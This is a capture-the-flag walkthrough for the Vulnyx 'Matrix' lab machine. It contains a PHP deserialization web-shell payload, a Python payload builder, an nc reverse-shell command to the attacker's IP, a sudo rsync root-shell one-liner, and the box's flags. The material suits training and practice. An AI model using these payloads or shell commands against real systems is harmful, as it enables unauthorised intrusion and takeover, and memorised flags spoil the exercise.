Vulnyx-Matrix-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.169 08:00:27:01:10:71 (Unknown)
192.168.60.254 00:50:56:e0:65:b2 (Unknown)

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 4 responded
export ip=192.168.60.169
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.169:22
Open 192.168.60.169:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 18:27 CST
Initiating ARP Ping Scan at 18:27
Scanning 192.168.60.169 [1 port]
Completed ARP Ping Scan at 18:27, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:27
Completed Parallel DNS resolution of 1 host. at 18:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:27
Scanning 192.168.60.169 [2 ports]
Discovered open port 80/tcp on 192.168.60.169
Discovered open port 22/tcp on 192.168.60.169
Completed SYN Stealth Scan at 18:27, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.169
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-02-01 18:27:56 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:01:10:71 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visiting port 80 in a browser shows a page with two options.

The page source shows that the red pill redirects to a PDF:

You have chosen truth. The Matrix awaits.


The blue pill redirects to Google:

You have chosen illusion. Return to your normal life.



The source also contains a hint:

❯ curl http://192.168.60.169/
…omitted…
<!-- Follow the red rabbit... Is it a dream or a clue? Within the saved traffic, you may find traces of the Matrix. Could it be a .pcap file ready to fuzz? -->
…omitted…

File fuzzing

Try fuzzing for a .pcap file with wfuzz.

This turns up a capture file, trinity.pcap:

❯ wfuzz -c -u "http://$ip/FUZZ.pcap" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 31
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.169/FUZZ.pcap
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000013086: 200 986 L 5851 W 139908 Ch "trinity"

Opening the capture, we find a webp image inside.

Save it out and change the file extension.


The red rabbit matches the hint exactly.

This is clearly the dream.


I assumed it was image steganography, or that the image needed to be brute-forced.

Later I found a useful hint in the image's description metadata:

❯ exiftool object172.image%2f.jpg
…omitted…
Description : Morpheus, we have found a direct connection to the 'Mind', the artificial intelligence that controls the Matrix. You can find it at the domain M47r1X.matrix.nyx.

PHP deserialization

Add the domain to /etc/hosts.

Visiting M47r1X.matrix.nyx gives a new page.


I sent some random lowercase text and it returned a path:

Morpheus, we successfully infiltrated the 'Mind' and uncovered part of its backend. We've made it accessible in the following file in case it can help you enter the Matrix: filtrate-backend-matrix.php.txt.

The backend source has clearly been leaked.

curl it and add a few comments:

❯ curl http://m47r1x.matrix.nyx/filtrate-backend-matrix.php.txt
<?php

class Message
{
public $file = "messages.txt"; // default file path
public $message = ""; // default message content

// Called by unserialize() with the property array taken straight from the serialized input
public function __unserialize(array $data): void
{
// If the incoming $data has a 'file' key, use it as the file path; otherwise keep the default 'messages.txt'
$this->file = $data['file'] ?? $this->file;
$this->message = $data['message']; // set the message property

// Append the message content to the chosen file
file_put_contents($this->file, $this->message . "\n", FILE_APPEND);
}
}


This is textbook PHP deserialization: the serialized data submitted by the form reaches unserialize(), __unserialize() takes both the file name and the content from that attacker-controlled array, and file_put_contents() writes them with the web server's privileges. In other words, an arbitrary file write into the web root.

Check messages.txt:

It holds exactly what I typed earlier, appended to the file.

❯ curl http://m47r1x.matrix.nyx/messages.txt

123
123
test
qwer

Intercepting the request shows that the form submits the serialized object:


So we can edit the serialized data directly.

Add a file key to choose the file name, and put a one-line web shell in message:


O:7:"Message":2:{s:4:"file";s:7:"exp.php";s:7:"message";s:15:"";}

(The 15-byte web-shell body between the last pair of quotes was stripped when this page was rendered, because it is a PHP tag; only its length, 15, survives. Every s:N prefix must match the byte length of the string that follows it, otherwise PHP's unserialize() rejects the payload.)
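To show how the payload above is built, and why the s:N length prefixes have to be exact, here is an added example in Python; it is not code from the original write-up or from the target. It serializes a Message object the way PHP's serialize() does and parses it back with a minimal checker that fails on a wrong length, as PHP's unserialize() would. The class and property names come from the leaked filtrate-backend-matrix.php.txt; the 15-byte web-shell body <?=`$_GET[0]`?> is an assumption chosen to match the s:15 length shown and the ?0=<command> usage later in the write-up, since the page does not reproduce it.

```python
"""Build and check the PHP-serialized Message payload from the write-up.

Added example; not code from the original write-up or the target box.
Class and property names follow the leaked filtrate-backend-matrix.php.txt.
The web-shell body is an ASSUMPTION consistent with the s:15 length in the
page's payload and with the later ?0=<command> usage.
"""

# Assumed 15-byte web shell: runs the value of the "0" query parameter via backticks.
WEBSHELL = "<?=`$_GET[0]`?>"


def php_serialize_string(s: str) -> str:
    """PHP string: s:<byte length>:"<bytes>"; -- the length counts bytes, not characters."""
    raw = s.encode("utf-8")
    return f's:{len(raw)}:"{s}";'


def php_serialize_object(class_name: str, props: dict) -> str:
    """PHP object with public properties only: O:<len>:"<class>":<count>:{<key><value>...}"""
    body = "".join(php_serialize_string(k) + php_serialize_string(v) for k, v in props.items())
    return f'O:{len(class_name)}:"{class_name}":{len(props)}:{{{body}}}'


def benign_payload(message: str) -> str:
    """What the form normally submits: no 'file' key, so __unserialize keeps messages.txt."""
    return php_serialize_object("Message", {"message": message})


def build_payload(file: str = "exp.php", message: str = WEBSHELL) -> str:
    """Attacker payload: 'file' overrides the destination, 'message' becomes the file content."""
    return php_serialize_object("Message", {"file": file, "message": message})


def php_unserialize_object(data: bytes) -> tuple:
    """Minimal parser for the O:/s: subset used above.

    Raises ValueError on any mismatch between a length prefix and the data.
    That is the point: PHP's unserialize() likewise fails (returns false)
    when s:<n> does not match the quoted bytes, so a hand-edited payload
    must have every length recomputed.
    """
    pos = 0

    def expect(tok: bytes) -> None:
        nonlocal pos
        if data[pos:pos + len(tok)] != tok:
            raise ValueError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)

    def read_int() -> int:
        nonlocal pos
        end = data.index(b":", pos)
        value = int(data[pos:end])
        pos = end + 1
        return value

    def read_str() -> str:
        nonlocal pos
        expect(b"s:")
        n = read_int()
        expect(b'"')
        s = data[pos:pos + n]
        pos += n
        expect(b'";')
        return s.decode("utf-8")

    expect(b"O:")
    n = read_int()
    expect(b'"')
    class_name = data[pos:pos + n].decode("utf-8")
    pos += n
    expect(b'":')
    count = read_int()
    expect(b"{")
    props = {}
    for _ in range(count):
        key = read_str()
        props[key] = read_str()
    expect(b"}")
    if pos != len(data):
        raise ValueError("trailing data after object")
    return class_name, props


if __name__ == "__main__":
    payload = build_payload()
    print(payload)
    print(php_unserialize_object(payload.encode("utf-8")))
```

Run it stand-alone and it prints the full payload with the web-shell body in place; change a single character of the message without recomputing the length and php_unserialize_object() rejects it, which is exactly what happens server-side if the s:N prefix is left stale.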

Visit exp.php:


User shell

Use nc to throw back a reverse shell:

http://m47r1x.matrix.nyx/exp.php?0=nc%20192.168.60.100%204444%20-e%20/bin/bash

Listen on the port:

❯ pwncat-cs -lp 4444
[19:49:14] Welcome to pwncat 🐈! __main__.py:164
[19:49:16] received connection from 192.168.60.169:57084 bind.py:84
[19:49:17] 192.168.60.169:57084: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@matrix:/var/www/M47r1X.matrix.nyx$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
smith:x:1000:1000::/home/smith:/bin/bash

We get a username, smith.

Recall that the capture also contained an rsync stream with a password in it.


Try logging in with it.

That gives us the user flag:

(remote) www-data@matrix:/home/smith$ su smith
Password:
smith@matrix:~$ cat user.txt
13fd11421e33199c2029bc8e5ed94626

Root privilege escalation

User smith has sudo rights:

Escalate through rsync. rsync's -e option names the program it runs as the remote shell; because sudo runs rsync as root, that program is spawned as root too, so pointing -e at sh yields a root shell.

smith@matrix:~$ sudo -l
[sudo] contraseña para smith:
Matching Defaults entries for smith on matrix:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User smith may run the following commands on matrix:
(ALL) PASSWD: /usr/bin/rsync

I first tried using rsync to upload a public key file:

873 - Pentesting Rsync - HackTricks

but I couldn't get that to work; fortunately rsync | GTFOBins has a privilege-escalation technique:

smith@matrix:/tmp$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
root@matrix:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@matrix:/tmp# cat /root/root.txt
5f3cae74fbcf1919cc7db7604317187a